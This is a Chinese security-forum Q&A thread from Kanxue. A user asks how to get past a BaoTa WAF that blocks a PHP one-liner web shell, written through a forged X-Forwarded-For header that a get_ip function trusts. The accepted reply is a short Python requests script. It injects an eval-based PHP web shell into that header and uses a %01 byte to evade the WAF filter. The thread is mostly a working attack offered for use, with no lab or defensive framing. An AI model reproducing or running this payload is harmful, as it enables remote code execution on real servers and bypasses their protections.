[求助]有waf怎么过能写入一般php-付费问答-看雪-安全社区|安全招聘|kanxue.com

[已解决] [求助]有waf怎么过能写入一般php 50.00雪花

发表于: 2020-11-24 15:45 2103

[已解决] [求助]有waf怎么过能写入一般php 50.00雪花

漠北蝈蝈

2020-11-24 15:45

2103

get_ip这个函数的问题，伪造了HTTP_X_FORWARDED_FOR头
4acK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6Q4x3X3b7H3x3e0R3%4i4K6u0W2K9s2y4K6P5h3u0H3i4K6u0W2j5$3&6Q4x3V1k6#2k6i4N6I4k6i4N6I4j5g2)9J5k6i4m8Z5M7l9`.`.

写入其他php都行，就是写入一句话不行会被拦截，开了宝塔waf

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・0

免费・0

支持

最新回复 (1)
huap 雪币： 8 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 10 粉丝 0 关注私信	huap (+50.00雪花) 2 楼 # coding: utf-8 import urllib import requests php = '<?php extract($_REQUEST);@eval%01($x);?>' header={ 'x-forwarded-for' : urllib.parse.unquote(php) } print(requests.get('39fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6Q4x3X3b7H3x3e0R3%4i4K6u0W2K9s2y4K6P5h3u0H3i4K6u0W2j5$3&6Q4x3V1k6#2k6i4N6I4k6i4N6I4j5g2)9J5k6i4m8Z5M7q4)9J5y4W2)9J5x3K6x3&6i4K6y4n7i4K6u0o6i4K6t1$3L8X3u0K6M7q4)9K6b7X3S2W2j5h3c8W2M7Y4y4Q4x3@1c8Z5k6h3q4V1k6i4u0Q4x3U0W2Q4x3X3g2@1k6i4S2@1i4K6t1&6 最后于 2020-11-25 14:44 被huap编辑，原因： 2020-11-25 14:27 (+50.00雪花) 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (1)

huap

雪币： 8

活跃值： (23)

能力值：

( LV2，RANK：10 )

在线值：

发帖

回帖

粉丝

关注

私信

huap: (+50.00雪花)
2 楼

# coding: utf-8
import urllib
import requests

php = '<?php extract($_REQUEST);@eval%01($x);?>'

header={
	'x-forwarded-for' : urllib.parse.unquote(php)
}

print(requests.get('39fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6Q4x3X3b7H3x3e0R3%4i4K6u0W2K9s2y4K6P5h3u0H3i4K6u0W2j5$3&6Q4x3V1k6#2k6i4N6I4k6i4N6I4j5g2)9J5k6i4m8Z5M7q4)9J5y4W2)9J5x3K6x3&6i4K6y4n7i4K6u0o6i4K6t1$3L8X3u0K6M7q4)9K6b7X3S2W2j5h3c8W2M7Y4y4Q4x3@1c8Z5k6h3q4V1k6i4u0Q4x3U0W2Q4x3X3g2@1k6i4S2@1i4K6t1&6

最后于 2020-11-25 14:44 被huap编辑，原因：

2020-11-25 14:27

(+50.00雪花)

漠北蝈蝈

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区